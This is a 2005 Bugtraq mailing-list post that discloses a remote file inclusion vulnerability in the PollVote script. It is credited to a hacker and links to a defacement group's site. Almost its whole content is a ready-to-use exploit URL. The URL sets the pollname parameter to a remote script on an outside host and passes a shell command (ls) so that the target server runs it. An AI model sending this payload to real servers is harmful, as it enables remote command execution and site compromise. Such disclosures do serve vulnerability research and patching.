[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
PollVote Remote File Inclusion
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: PollVote Remote File Inclusion
- From: stormhacker@xxxxxxxxxxx
- Date: 14 Nov 2005 01:52:15 -0000
Title: PollVote Remote File Inclusion
http://www.worlddefacers.net
Vulnerability Discovery: rUnViRuS
----------------------------------
exploit :-
http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls